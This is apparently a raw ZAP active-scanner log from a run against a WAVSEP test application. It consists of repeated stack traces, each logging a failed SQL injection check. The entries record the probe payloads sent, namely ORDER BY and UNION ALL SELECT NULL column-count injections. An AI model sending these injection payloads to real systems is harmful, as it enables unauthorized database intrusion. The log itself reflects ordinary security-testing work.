org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688393 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1382-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini ORDER BY 1382-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688394 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688396 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688396 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688398 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688399 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688401 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688402 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688403 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688409 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688410 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688411 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini) ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at 